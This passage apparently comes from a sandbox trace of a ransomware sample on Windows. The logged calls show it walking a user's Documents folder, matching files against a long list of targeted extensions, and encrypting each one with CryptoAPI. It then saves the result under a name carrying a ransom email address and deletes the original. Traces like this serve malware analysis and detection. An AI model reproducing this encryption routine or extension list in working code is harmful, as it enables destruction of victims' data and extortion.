skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0185.410] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2851270, ftCreationTime.dwHighDateTime=0x1d9739d, ftLastAccessTime.dwLowDateTime=0xe433df10, ftLastAccessTime.dwHighDateTime=0x1d97656, ftLastWriteTime.dwLowDateTime=0xe433df10, ftLastWriteTime.dwHighDateTime=0x1d97656, nFileSizeHigh=0x0, nFileSizeLow=0x3c5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="F1zD8ug2krjM.docx", cAlternateFileName="F1ZD8U~1.DOC")) returned 1
	[0185.410] lstrcmpW (lpString1="F1zD8ug2krjM.docx", lpString2="..") returned 1
	[0185.410] lstrcmpW (lpString1="F1zD8ug2krjM.docx", lpString2=".") returned 1
	[0185.410] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0185.410] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="F1zD8ug2krjM.docx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\F1zD8ug2krjM.docx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\F1zD8ug2krjM.docx"
	[0185.410] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\F1zD8ug2krjM.docx") returned 49
	[0185.411] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0185.411] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\F1zD8ug2krjM.docx", cchLength=0x31 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\f1zd8ug2krjm.docx") returned 0x31
	[0185.411] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.411] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\f1zd8ug2krjm.docx", lpSrch="help_decrypt_your_files") returned 0x0
	[0185.411] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\f1zd8ug2krjm.docx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\f1zd8ug2krjm.docx") returned="c:\\users\\rdhj0cnfevzx\\documents\\f1zd8ug2krjm.docx"
	[0185.411] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\f1zd8ug2krjm.docx") returned 49
	[0185.411] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.412] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.412] StrStrW (lpFirst=".docx", lpSrch=".") returned=".docx"
	[0185.412] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.412] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".docx") returned=".docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0185.413] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0185.413] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0185.413] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\f1zd8ug2krjm.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\f1zd8ug2krjm.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0185.418] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x3c5a, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x3c5a, lpOverlapped=0x0) returned 1
	[0185.421] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.421] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb7f8) returned 1
	[0185.423] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.424] CryptCreateHash (in: hProv=0xfcb7f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0185.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.424] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0185.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.424] CryptDeriveKey (in: hProv=0xfcb7f8, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9830) returned 1
	[0185.424] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.424] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x3c5a, dwBufLen=0x3c5a | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x3c60) returned 1
	[0185.425] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.425] RtlMoveMemory (in: Destination=0xfe0de8, Source=0xfdd180, Length=0x3c5a | out: Destination=0xfe0de8) 
	[0185.426] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.426] CryptEncrypt (in: hKey=0xfb9830, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe0de8*, pdwDataLen=0x18bc0c*=0x3c5a, dwBufLen=0x3c60 | out: pbData=0xfe0de8*, pdwDataLen=0x18bc0c*=0x3c60) returned 1
	[0185.426] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.426] CryptDestroyKey (hKey=0xfb9830) returned 1
	[0185.426] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.427] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0185.427] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.427] CryptReleaseContext (hProv=0xfcb7f8, dwFlags=0x0) returned 1
	[0185.427] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.427] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0185.428] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0185.428] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0185.429] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\f1zd8ug2krjm.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 91
	[0185.429] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\f1zd8ug2krjm.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\f1zd8ug2krjm.docx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0185.430] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe0de8*, nNumberOfBytesToWrite=0x3c60, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe0de8*, lpNumberOfBytesWritten=0x18c068*=0x3c60, lpOverlapped=0x0) returned 1
	[0185.434] CloseHandle (hObject=0x2c0) returned 1
	[0185.434] CloseHandle (hObject=0x384) returned 1
	[0185.434] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\f1zd8ug2krjm.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\f1zd8ug2krjm.docx")) returned 1
	[0185.468] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\f1zd8ug2krjm.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\f1zd8ug2krjm.docx")) returned 0
	[0185.468] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc08b0b0, ftCreationTime.dwHighDateTime=0x1d93714, ftLastAccessTime.dwLowDateTime=0x5e41a740, ftLastAccessTime.dwHighDateTime=0x1d940cb, ftLastWriteTime.dwLowDateTime=0x5e41a740, ftLastWriteTime.dwHighDateTime=0x1d940cb, nFileSizeHigh=0x0, nFileSizeLow=0x18e4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="fO94sdtQ.pptx", cAlternateFileName="FO94SD~1.PPT")) returned 1
	[0185.468] lstrcmpW (lpString1="fO94sdtQ.pptx", lpString2="..") returned 1
	[0185.468] lstrcmpW (lpString1="fO94sdtQ.pptx", lpString2=".") returned 1
	[0185.469] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\"
	[0185.469] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\", lpString2="fO94sdtQ.pptx" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\fO94sdtQ.pptx") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\fO94sdtQ.pptx"
	[0185.469] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\fO94sdtQ.pptx") returned 45
	[0185.469] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0185.469] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\fO94sdtQ.pptx", cchLength=0x2d | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\fo94sdtq.pptx") returned 0x2d
	[0185.469] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.470] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\fo94sdtq.pptx", lpSrch="help_decrypt_your_files") returned 0x0
	[0185.470] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\fo94sdtq.pptx" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\fo94sdtq.pptx") returned="c:\\users\\rdhj0cnfevzx\\documents\\fo94sdtq.pptx"
	[0185.470] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\fo94sdtq.pptx") returned 45
	[0185.470] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0185.470] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.470] StrStrW (lpFirst=".pptx", lpSrch=".") returned=".pptx"
	[0185.471] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0185.471] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vp